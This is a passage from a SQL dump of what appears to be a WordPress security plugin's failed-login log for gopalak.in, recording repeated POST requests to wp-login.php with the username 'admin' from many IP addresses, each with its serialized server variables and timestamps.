00:00:00'),(93708,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/EJtGLAnCAx+NAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50816\";s:11:\"REMOTE_ADDR\";s:15:\"103.148.164.166\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744769179.74631;s:12:\"REQUEST_TIME\";i:1744769179;}}','103.148.164.166',0,'2025-04-16 07:36:21','1970-01-01 00:00:00'),(93709,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/E5pGLAnCAyEIAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53718\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.114.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744769947.4863501;s:12:\"REQUEST_TIME\";i:1744769947;}}','198.54.114.126',0,'2025-04-16 07:49:09','1970-01-01 00:00:00'),(93710,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/Fp5GLAnCAyLHAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60962\";s:11:\"REMOTE_ADDR\";s:14:\"20.204.164.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744770718.958838;s:12:\"REQUEST_TIME\";i:1744770718;}}','20.204.164.126',0,'2025-04-16 08:02:00','1970-01-01 00:00:00'),(93711,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/GalGLAnCAyQiAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51710\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.126.68\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744771497.7280049;s:12:\"REQUEST_TIME\";i:1744771497;}}','198.54.126.68',0,'2025-04-16 08:14:59','1970-01-01 00:00:00'),(93712,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/HLRGLAnCAyWWAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35004\";s:11:\"REMOTE_ADDR\";s:12:\"162.0.235.20\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744772277.3723879;s:12:\"REQUEST_TIME\";i:1744772277;}}','162.0.235.20',0,'2025-04-16 08:27:59','1970-01-01 00:00:00'),(93713,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/H75GLAnCAybmAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38488\";s:11:\"REMOTE_ADDR\";s:13:\"51.178.81.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744773054.3559899;s:12:\"REQUEST_TIME\";i:1744773054;}}','51.178.81.248',0,'2025-04-16 08:40:56','1970-01-01 00:00:00'),(93714,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/Is1GLAnCAygnAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55038\";s:11:\"REMOTE_ADDR\";s:13:\"49.238.228.30\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744773837.4738619;s:12:\"REQUEST_TIME\";i:1744773837;}}','49.238.228.30',0,'2025-04-16 08:53:59','1970-01-01 00:00:00'),(93715,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/JddGLAnCAym0Ag==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46594\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.215.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744774616.4680901;s:12:\"REQUEST_TIME\";i:1744774616;}}','162.0.215.190',0,'2025-04-16 09:06:58','1970-01-01 00:00:00'),(93716,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/KOZGLAnCAyr2Ag==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57770\";s:11:\"REMOTE_ADDR\";s:12:\"195.161.68.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744775399.3685851;s:12:\"REQUEST_TIME\";i:1744775399;}}','195.161.68.8',0,'2025-04-16 09:20:01','1970-01-01 00:00:00'),(93717,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/K/pGLAnCAyxMAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59950\";s:11:\"REMOTE_ADDR\";s:15:\"185.218.124.157\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744776186.4036169;s:12:\"REQUEST_TIME\";i:1744776186;}}','185.218.124.157',0,'2025-04-16 09:33:08','1970-01-01 00:00:00'),(93718,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/LxRGLAnCAy15Ag==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 